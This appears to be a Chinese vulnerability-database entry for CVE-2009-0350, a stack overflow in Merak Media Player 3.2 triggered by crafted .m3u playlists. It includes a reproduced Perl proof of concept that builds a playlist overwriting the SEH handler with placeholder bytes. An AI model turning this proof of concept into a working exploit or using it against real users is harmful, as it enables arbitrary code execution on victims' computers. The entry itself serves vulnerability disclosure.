Merak Media Player .m3u文件处理栈溢出漏洞

漏洞ID	1117286	漏洞类型	缓冲区溢出
发布时间	2009-01-25	更新时间	2009-03-03
CVE编号	CVE-2009-0350	CNNVD-ID	CNNVD-200901-446
漏洞平台	Windows	CVSS评分	9.3

|漏洞来源

https://www.exploit-db.com/exploits/7857
https://www.securityfocus.com/bid/33419
https://cxsecurity.com/issue/WLB-2009010249
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-446

|漏洞详情

MerakMediaPlayer中文名为木子播放器，支持多种文件格式。MerakMediaPlayer在处理状态栏图标的ToolTip文本时存在栈溢出漏洞，如果用户受骗打开了特制的播放列表(.m3u)文件就可以触发这个溢出，导致执行任意代码。

|漏洞EXP

#!/usr/bin/perl -w

# Author : Houssamix

# Merak Media Player V3.2  m3u file Local Buffer overflow (SEH) 
# Download :  http://www.qwerks.com/download/3748/merak.zip

# --------------------------------------------
# EAX 00000000
# ECX 45454545
# EDX 7C9137D8 ntdll.7C9137D8
# EBX 00000000
# ESP 0013F784
# EBP 0013F7A4
# ESI 00000000
# EDI 00000000
# EIP 45454545

# 0013FBE4   42424242  Pointer to next SEH record
# 0013FBE8   45454545  SE handler
# ---------------------------------------------

print "===================================================================== \n";
print "Author : Houssamix 						     \n";
print "===================================================================== \n";
print "Merak Media Player V3.2  m3u file Local Buffer overflow (SEH) 		 \n";
print "===================================================================== \n";

my $buf = "\x42" x 78;
my $seh = "\x45\x45\x45\x45";
my $buff = "\x43" x 1120;
my $file="hsmx.m3u";
$exploit = $buf.$seh.$buff;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "$file has been created \n";

# milw0rm.com [2009-01-25]

|受影响的产品

Qwerks Merak Media Player 3.2

|参考资料

来源:MILW0RM
名称:7857
链接:http://www.milw0rm.com/exploits/7857
来源:SECUNIA
名称:33645
链接:http://secunia.com/advisories/33645
来源:OSVDB
名称:51565
链接:http://osvdb.org/51565